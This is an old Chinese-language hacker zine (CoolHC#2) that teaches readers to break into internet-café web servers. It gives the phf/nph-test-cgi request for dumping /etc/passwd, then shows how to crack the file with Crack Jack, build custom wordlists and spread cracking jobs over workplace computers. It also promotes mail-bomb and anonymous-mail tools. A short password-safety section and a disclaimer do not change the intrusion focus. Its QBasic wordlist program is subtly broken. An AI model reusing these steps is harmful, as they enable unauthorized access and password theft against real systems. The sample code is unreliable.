藍色情懷

這不是一個教學文件, 只是告訴你該如何破解系統,好讓你能夠將自己的系統作安全的保護, 如果你能夠將這份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦, 我是 CoolFire, 寫這篇文章的目的是要讓大家明白電腦安全的重要性, 並不是教人 Crack Password若有人因此文件導致惡意入侵別人的電腦或網路, 本人概不負責 !!

話說上次 CoolFire 講到許多的 Net Coffee 店, 安全性之差實在是沒話說,但是過了這麼久也不見有幾家改進, 可能是想讓自己的電腦被別人玩弄在股掌之間吧, 但可不是每個人都像CoolFire這樣溫和, 如果遇到的是比較狠一點的角色, 那你的 Net Coffee 可能要有一兩天只賣Coffee 而沒辦法再 Net 下去了!!

繼 CoolHC#1 推出後, 有許多人是否已經躍躍愈試了呢 ?? 這次咱們不談新的花招,用用之前所講的再來探險一番, 當然, 這一次我照往例還是不會使用真正的 Domain Name 來作教學,但是課程中的所有內容絕對屬實, 當然本次攻擊的對象還是.... Net Coffee Shop....

**談一下 Crack Jack 猜猜密碼

許多人從上一次介紹 Crack Jack 之後就應該已經領教過它的功力了,但是有幾點需要說明的,
有些人使用 Jack 來幫你尋找 password, 我就當你已經抓到了沒有 shadow 的 /etc/passwd,
但是為甚麼使用 Jack 還是找不到呢?? 我想你應該要換個正點一點的字典檔了, 因為Jack 還
是根據你所提供的字典檔在尋找, 如果你提供的字典本身就沒有這些字,那當然連一個小小帳號
的密碼你都別想猜到了. 數一下你所使用的字典檔中有多少字 ???我用的字典檔有十九萬多個
字, 你的呢? 是不是小巫見大巫呀 ?? 那麼就趕快充實一下字典檔再重新尋找吧 !!

許多人的密碼都有一定的法則, 我自己寫了 PaSs2DiC 就是將 UserName 由passwd檔轉成字典檔的工具, 這是對一些喜歡使用 UserName 當作 Password 的人最好的方式,但是也曾經好運的找到別人的密碼, 真不曉得"甲"是不是暗戀"乙"才用"乙"的 ID 作為密碼的 ???你可以很簡單的使用Qbasic 來製作 "序數" 密碼, 或日期密碼, 底下簡單的作一個 0101 (一月一日) 到
1231 的密碼
檔出來:
------------Cut Here MakeDate.BAS -------------------
Open "Dates" for output as #1
for I=1 to 12
for J=1 to 31
I1$=rtrim$(ltrim$str$(I)))
J1$=rtrim$(ltrim$str$(J)))
if len(I1$)=1 then I1$="0"+I1$
if len(J1$)=1 then J1$="0"+J1$
Out$=I1$+J1$
print #1,Out$
next I
next J
close
------------ Cut Here End MakeDate.BAS ----------------
這支小程式將會寫一個 "DATES" 的檔案, 裡面就是你要的字典, 當然啦,這只是包含月跟日 !!
如果你要猜的密碼是含年份的, 你可能要再增加一些程式碼, 再 Run 一次試試看了,不過這是一個好的開始不是嗎 ??

**如何保護自己的密碼

談了這麼多的密碼猜法, 當然要談一下如何保護自己的密碼不被破解,
請遵守以下的原則:

[1]不用生日作為密碼(太容易猜了啦) [2]不用序數作為密碼(除非你的序數無限大)
[3]不用身份證字號作為密碼(LetMeIn! 裡有猜身份證字號的功能耶)
[4]不用在字典中查得到的字作為密碼.

那麼依照上面的幾點說法, 甚麼樣子的密碼最不容易猜, 自己也最好記呢?? 答案是:用一句有意義的話來作為自己的密碼, 例如: NoOneCanCrackIt 就是一個很難猜的密碼類型,基於這個密碼猜法的原則, 你的密碼是不是要作些更新, 或是大小寫要作一些對調 ?? 如果你的密碼是
coolfire,
建議你最好能改成 CoolFire 或 coolfires (加複數 "s"),
這樣被猜中的機率就小了很多. 如果你是一個 Hacker, 你的密碼也被人猜中的話... 那...#%%^^^&@

**正式的話題

這次的話題當然還是 Crack, 相信許多人已經看過 CoolHC#1 了,當然眼尖的人可能也已經 D/L
System Holes 試過了, 你有成功的例子嗎 ?? 如果沒有, 這份 CoolHC#2可能就是你的強心針,
因為這次談的正是 System Holes #1 成功的案例.Step 1. 連線到 "蕃薯藤" 找 "網路咖啡" 找到好多家網路咖啡的 WWW 網址,一一連上去試試看
在 System Holes #1 中的方法可不可行.
Step 2. 若可行則會傳回 /etc/passwd 資訊, 存檔後迅速 Logout, 使用 Crack Jack
解讀!!

[[實例探討]]

System Holes #1 中所介紹的 WWW 入侵法是這樣子的:
http://www.somewhere.com/cgi-bin/nph-test-cgi?* 後再
http://www.somewhere.com/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd

[1] 用 WWW Browser 連到 yournet.net
[2] Location 輸入 --> "www.yournet.net/cgi-bin/nph-test-cgi?*"
[3] 接著如果出來一份像 Report 的畫面的話, 接著輸入
/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
[4] 發生了甚麼事?? etc/passwd 在你的瀏覽器中 "顯示" 出來了 !! 快點 Save 吧
!!

這個方法所用的是系統 "檢索" 的漏洞, 不提供這個功能,或是伺服器檢索類型不同的機器則不
會接受這樣的指令, 當然也就逃過我們這次的模擬演練啦 !! 但是.... 相信我,你一定會找到一家脫線的網路咖啡, 並沒有像我們一樣每天閱讀 Mail List 的信,對系統安全一點研究也沒有的人不在少數. http://hacker.welcome.com 就是這樣的一個 Net Coffee Shop...呵.... 快來試試吧 !!

當 CoolFire 抓到 /etc/passwd 後, 立刻存檔, 也馬上斷線, 並且拿出 UltraEdit來瞧一下使用者的資訊, 當然這個小 passwd 對 Crack Jack 來說, 實在是不夠看,沒幾分鐘就在我的 486 機器上顯示出來幾個以 UserName 作為 Password 的資訊 (歸功於 PaSs2DiC 及CrackJack 的功勞)不過當我試著找尋 root 的密碼時, 一想到我那將近 20 萬字的字典檔,就想到可能花費的時間一定相當的驚人, 於是就以 Jack 的 Option 設定只尋找 root 那一行, ...(過了良久)... 果不然又是一個笨 root. 用了 "非常" 容易猜的密碼... <--- This is JackAss... 呵!! Got It!

如果你所使用的機器速度不是頂快, 你最好能夠到快一點的機器上使用 Crack Jack,不然你也可以將字典檔切割成幾個小檔案, 然後再分別在幾台機器上跑, 我目前使用的配備是486DX4-13032MB RAM, 3.2GB HDD, 近 20 萬字的字典檔, 如果在分析較大的 passwd檔時我會將字典檔切割為四至五個小檔 (看有多少台機器可跑),然後在週末下班前在公司的幾台機器上分別執行 Crack Jack, 等到禮拜一上班時就等著接收成果了! 當然如果你只有一台機器, passwd檔又很大的話,由於 Crack Jack 無法於 Windoz 95 下使用, 你可能只能犧升時間或機器來跑了!再沒有辦法的話, 亦可使用單機多工, 多開幾個 DOS Box 來跑 Brute, 也許也是一個可行的辦法!

**後語

有許多人在使用 Crack Jack 的時候有許多問題, 不過看了 CoolHC#1 應該都解決了吧?? 最近大家問的比較多的是 UpYours 3.0, 雖然已經改進了 Install 的問題,不過大家的問題還是都出在Winsck.ocx 上面, 有人說裝了 MSICP Beta 會好 ?? 但也有實例裝了也還不能 Run 的,
在此建議大家不要再玩 MailBomb 了, 雖然我喜歡收集這種東西, 但還是少亂炸為妙,已經證實有許多常用的 MailBomb 沒有辦法 Fake IP 了 !! 所以... 如果 UpYours 3.0裝不起來的人就試試 KaBoom!V3.0 吧 ! 雖然沒有辦法 Fake IP (選錯 Mail Server 的話), 但是也是一個不錯的AnonyMailer如果要發匿名信, 現在首頁上有可以幫你發信的 Mailer, 會安全一點.

如果你仍舊對 UpYours 3.0 不死心, 就試試 ResSvr32.exe (Under Windows/systemrectory),
看看能不能將 WinSck.ocx 裝上了... 記得先 UnReg 再 Reg...

在此建議大家可以多訂閱一些 "系統安全" 討論的 Mail List或多參考一些已經被找出來的系統漏洞, 因為有些人對這些方面並不是很重視, 所以這些資訊也就顯得格外的重要了,如果能夠多參考一些資訊, 在你入侵的時候會有很大的幫助, 當然, 如果你能作出一份列表出來,放在手邊參考的話, 就可以快速的; 安全的入侵了!! 下一次所談的是 SendMail 的 Bug 實例,在這中間當然照往例會先出一份 System Holes #2 來作為資料. 如果有興趣的人在 SH#2出來的時候可以先研究看看. 下次見! Merry X'Mas..... & Happy New Year.......

------
上次講的 Home Page 建置案還沒搞完, 沒有充實一下 Home Page 實在是對不起大家,所以利用一點時間寫了 CoolHC#2, 可能報告又交不出來了 !! 老話,如果你有興趣寫其它程式的中文說明, 請完成後寄一份給我, 我將它放在 Home Page 上面讓其它人參考,當然你也可以給我你的使用心得, 讓別人參考看看也行! 目前準備收集一系列的 System Hole List,如果你在其它的站台有看到的, 請把它先 Cut 下來, Mail 一份給我 !

------
再次重申, Crack 別人站台之後不要破壞別人站台中的資料, 此篇文章僅作為教育目的,不主張你隨便入侵他人主機.... (高-Net 還是除外)... 請勿將這類技術使用於破壞上 (又...如果第三次世界大戰開打, 你可以任意破壞敵國的電腦網路... 我全力支持),最嚴重的情況(如果你真的很討厭該主機的話)... 就將它 Shut Down.... 好了! 別太暴力了!